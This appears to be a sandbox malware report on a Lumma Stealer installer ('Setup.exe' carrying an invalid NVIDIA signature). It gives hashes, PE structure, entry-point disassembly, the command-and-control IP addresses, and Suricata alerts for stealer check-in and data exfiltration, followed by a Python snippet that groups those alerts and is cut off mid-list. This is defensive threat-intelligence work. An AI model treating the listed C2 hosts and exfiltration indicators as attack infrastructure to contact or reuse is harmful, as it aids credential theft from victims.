                                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 188.114.96.3
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 172.67.208.58
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.90.109
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              a0e9f5d64349fb13191bc781f81f42e1Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
                                                                                                              Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                              • 104.21.64.1
                                                                                                              • 185.161.251.21
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 0.512131792943311
TrID:
• Win32 Executable (generic) a (10002005/4) 97.75%
• Windows ActiveX control (116523/4) 1.14%
• Inno Setup installer (109748/4) 1.07%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: Setup.exe
File size: 75'077'735 bytes
MD5: 2fbed9c7f4e671459ba52391d1d2975d
SHA1: 89e3ebc3fb946566a77bb1359d0f43eded9ff3a2
SHA256: 0f17388ac1220dcb7bcb2889e16bb21fae876045a55079a572057c75fa2d2067
SHA512: ddbc924f47f8ae7d6c27026c293b94cd1640f32a82c8cc9561693e6f5cee490c695f29db307c2d1b68d72651e40f8bbfe6e4149009a8fe387bcfd6d4edf29bf1
SSDEEP: 24576:bnbbPIm7K4brDi4IxgRqzwqNb+Yz73P2EMZbG0JEtdqxytD7TriBH0T0OgxLDQX:THBKh4nqzF3PYdStoari+gJQ
TLSH: 13F7D2ABF2D00BA5B75236ED4D0E9FCD99146110A31014FF6F9A050A6EFB5D84332A7E
File Content Preview: MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 2d2e3797b32b2b99
Entrypoint: 0x5025d8
Entrypoint Section: .itext
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: f62b90e31eca404f228fcf7068b00f31
Signature Valid: false
Signature Issuer: CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before: 27/07/2015 20:00:00
Not After: 26/07/2018 19:59:59
Subject Chain:
• CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
Version: 3
Thumbprint MD5: F7219078FBE20BC1B98BF8A86BFC0396
Thumbprint SHA-1: 30632EA310114105969D0BDA28FDCE267104754F
Thumbprint SHA-256: 1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
Serial: 14781BC862E8DC503A559346F5DCC518
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 00500930h
call 00007FDE0D186846h
push FFFFFFECh
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov ebx, dword ptr [eax+00000170h]
push ebx
call 00007FDE0D1876F1h
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
mov eax, dword ptr [00505E5Ch]
push ebx
call 00007FDE0D187946h
xor eax, eax
push ebp
push 00502653h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007FDE0D187091h
call 00007FDE0D27DF2Ch
mov eax, dword ptr [00500568h]
push eax
push 005005CCh
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
call 00007FDE0D1F9D1Dh
call 00007FDE0D27DF80h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007FDE0D27FEFBh
jmp 00007FDE0D181F6Dh
call 00007FDE0D27DCFCh
mov eax, 00000001h
call 00007FDE0D182A2Eh
call 00007FDE0D1823B1h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov edx, 005027E8h
call 00007FDE0D1F9828h
push 00000005h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000170h]
push eax
call 00007FDE0D187907h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [004DACA0h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10e000 | 0x3840 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x114000 | 0x6fe00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4795ea7 | 0x39c0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x113000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10ea80 | 0x88c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xffdc8 | 0xffe00 | 75eab3cd689bdfd0b7c52f77c4597fdf | False | 0.483021075048852 | data | 6.485099366431733 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x101000 | 0x17f4 | 0x1800 | 8e0d52126a75001416d71c23878be2c1 | False | 0.5244140625 | data | 6.003729381717893 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x103000 | 0x308c | 0x3200 | c2acc8e96fc244753abd1d87bb624bc0 | False | 0.425078125 | data | 4.3575606000501415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x107000 | 0x6198 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x10e000 | 0x3840 | 0x3a00 | 0e1e8128f777a5ff18a144305a4fb39c | False | 0.3108836206896552 | data | 5.2048781278956655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x112000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x113000 | 0x18 | 0x200 | 9cf98ea6bb17a35d99fa770a2e9a8ff0 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x114000 | 0x6fe00 | 0x6fe00 | 09c3297f581f32b4217214693c9232b0 | False | 0.5837792423184358 | data | 7.2672713896631524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x114c44 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x114d78 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x114eac | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x114fe0 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x115114 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x115248 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x11537c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x1154b0 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | | | 0.2945859872611465
RT_BITMAP | 0x115998 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.521551724137931
RT_ICON | 0x115a80 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675
RT_ICON | 0x115ba8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179
RT_ICON | 0x116110 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548
RT_ICON | 0x1163f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516
RT_STRING | 0x116ca0 | 0xec | data | | | 0.6059322033898306
RT_STRING | 0x116d8c | 0x250 | data | | | 0.47466216216216217
RT_STRING | 0x116fdc | 0x28c | data | | | 0.4647239263803681
RT_STRING | 0x117268 | 0x3e4 | data | | | 0.4347389558232932
RT_STRING | 0x11764c | 0x9c | data | | | 0.717948717948718
RT_STRING | 0x1176e8 | 0xe8 | data | | | 0.6293103448275862
RT_STRING | 0x1177d0 | 0x468 | data | | | 0.3820921985815603
RT_STRING | 0x117c38 | 0x38c | data | | | 0.3898678414096916
RT_STRING | 0x117fc4 | 0x3dc | data | | | 0.39271255060728744
RT_STRING | 0x1183a0 | 0x360 | data | | | 0.37037037037037035
RT_STRING | 0x118700 | 0x40c | data | | | 0.3783783783783784
RT_STRING | 0x118b0c | 0x108 | data | | | 0.5113636363636364
RT_STRING | 0x118c14 | 0xcc | data | | | 0.6029411764705882
RT_STRING | 0x118ce0 | 0x234 | data | | | 0.5070921985815603
RT_STRING | 0x118f14 | 0x3c8 | data | | | 0.3181818181818182
RT_STRING | 0x1192dc | 0x32c | data | | | 0.43349753694581283
RT_STRING | 0x119608 | 0x2a0 | data | | | 0.41964285714285715
RT_RCDATA | 0x1198a8 | 0x82e8 | data | English | United States | 0.11261637622344235
RT_RCDATA | 0x121b90 | 0x10 | data | | | 1.5
RT_RCDATA | 0x121ba0 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333
RT_RCDATA | 0x1233a0 | 0x6bc | data | | | 0.6467517401392111
                                                                                                              RT_RCDATA0x123a5c0x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                              RT_RCDATA0x12956c0x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                              RT_RCDATA0x1296940x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                              RT_RCDATA0x129a380x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                              RT_RCDATA0x129d580x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                              RT_RCDATA0x12a0580x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                              RT_RCDATA0x12a6340x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                              RT_RCDATA0x12aa980x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                              RT_GROUP_CURSOR0x12cb2c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                              RT_GROUP_CURSOR0x12cb400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                              RT_GROUP_CURSOR0x12cb540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x12cb680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x12cb7c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x12cb900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x12cba40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_ICON0x12cbb80x3edataEnglishUnited States0.8387096774193549
                                                                                                              RT_VERSION0x12cbf80x15cdataEnglishUnited States0.5689655172413793
                                                                                                              RT_MANIFEST0x12cd540x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | AlphaBlend
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
shell32.dll | SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
ole32.dll | CoDisconnectObject
advapi32.dll | AdjustTokenPrivileges
oleaut32.dll | SysFreeString
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-05T18:58:13.957384+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49721 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:14.714158+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49721 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:14.714158+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49721 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:15.214340+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49722 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:15.710485+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49722 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:15.710485+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49722 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:16.373395+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49723 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:17.512468+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49724 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:18.684917+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49725 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:20.350470+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49728 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:20.812695+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49728 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:22.150236+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49731 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:23.191474+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49742 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:23.623861+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49742 | 104.21.64.1 | 443 | TCP
2025-01-05T18:58:24.491158+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49748 | 185.161.251.21 | 443 | TCP
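The alert list above mixes a TLS-fingerprint rule (the JA3 signature, priority 3) with content-based Lumma rules (priority 1) across nine TCP connections. Added example, not part of the Joe Sandbox report: the Python below groups the alerts into flows and rolls them up per destination IP, so the connections on which only the JA3 rule fired can be told apart from the ones with a check-in or exfiltration hit. The alert values are transcribed from the table; the field names, the grouping logic and the "family" keyword match are this example's own choices.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    ts: str        # timestamp as printed in the report (ISO 8601, same offset everywhere)
    sid: int       # Suricata signature ID
    msg: str       # rule message
    priority: int  # Suricata priority: 1 is the most severe
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


JA3 = "ET JA3 Hash - Possible Malware - Fake Firefox Font Update"
HOST, C2, C2_ALT = "192.168.2.5", "104.21.64.1", "185.161.251.21"

# The fifteen alert rows from the table above, transcribed as constructed
# input for this example (no live capture is read).
ALERTS = [
    Alert("2025-01-05T18:58:13.957384+0100", 2028371, JA3, 3, HOST, 49721, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:14.714158+0100", 2049836, "ET MALWARE Lumma Stealer Related Activity", 1, HOST, 49721, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:14.714158+0100", 2054653, "ET MALWARE Lumma Stealer CnC Host Checkin", 1, HOST, 49721, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:15.214340+0100", 2028371, JA3, 3, HOST, 49722, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:15.710485+0100", 2049812, "ET MALWARE Lumma Stealer Related Activity M2", 1, HOST, 49722, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:15.710485+0100", 2054653, "ET MALWARE Lumma Stealer CnC Host Checkin", 1, HOST, 49722, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:16.373395+0100", 2028371, JA3, 3, HOST, 49723, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:17.512468+0100", 2028371, JA3, 3, HOST, 49724, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:18.684917+0100", 2028371, JA3, 3, HOST, 49725, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:20.350470+0100", 2028371, JA3, 3, HOST, 49728, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:20.812695+0100", 2048094, "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration", 1, HOST, 49728, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:22.150236+0100", 2028371, JA3, 3, HOST, 49731, C2, 443, "TCP"),
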